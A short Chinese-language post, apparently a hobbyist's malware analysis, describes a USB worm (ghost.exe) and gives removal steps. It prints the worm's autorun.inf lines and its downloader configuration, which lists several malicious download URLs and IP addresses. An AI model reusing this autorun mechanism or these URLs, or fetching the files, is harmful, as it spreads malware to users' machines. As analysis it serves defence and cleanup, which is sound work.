今天吃饭前..接到某位mm 求助..说电脑又中毒了..

　　按照习惯先叫他扫个SREng 的 log 看看..意外的发现了个 ghost.exe 和四五个小病毒..

　　就跟她拿了 ghost.exe 看看.. 又是一个 U 盘病毒 还会下载病毒..

　　现在写一点点的小分析 ..目前瑞星不报..在线扫了扫发现就几家报了..

　　运行ghost.exe 后..

　　生成

　　ghost.exe.bat(删除自身)

　　C:WINDOWSsystemconime.exe

　　C:Program FilesWinRARWinRAR.exe.tmp

　　每个盘符下释放(c d e f g h j k )

　　autorun.inf

　　ghost.exe

　　autorun.inf 文件内容

　　[AutoRun]

　　OPEN=ghost.exe

　　shellexecute=ghost.exe

　　shell打开(&O)command=ghost.exe

　　连入 http://www.dj916.com/ie.txt 下载..

　　ie.txt 内容

　　[main]

　　服务文件更新=5

　　服务文件地址=http://www.86dy.net/c123.exe

　　下载者是否更新=4

　　下载个数=7

　　文件1=http://222.220.16.185/data6/jwm.exe

　　更新1=6

　　文件2=http://222.220.16.185/data6/wol.exe

　　更新2=6

　　文件3=http://222.220.16.185/data6/wo3.exe

　　更新3=6

　　文件4=http://222.220.16.185/data6/mir.exe

　　更新4=6

　　文件5=http://222.220.16.185/data6/mhh.exe

　　更新5=6

　　文件6=http://222.220.16.181/ienet.exe

　　更新6=6

　　文件7=http://222.220.16.185/data6/zt3.exe

　　更新7=6

　　这些网址都是下载下来的病毒..

　　没写入注册表..

　　但是我用反汇编看了看..

　　这玩意应该修改了

　　讯雷 QQ WINRAR 的注册表 ..

　　处理方法(不包括下载下来的病毒)

　　右键=>打开进入每个盘符=>删除

　　autorun.inf

　　ghost.exe

　　删除文件

　　C:WINDOWSsystemconime.exe

　　建议重装 qq 讯雷 WINRAR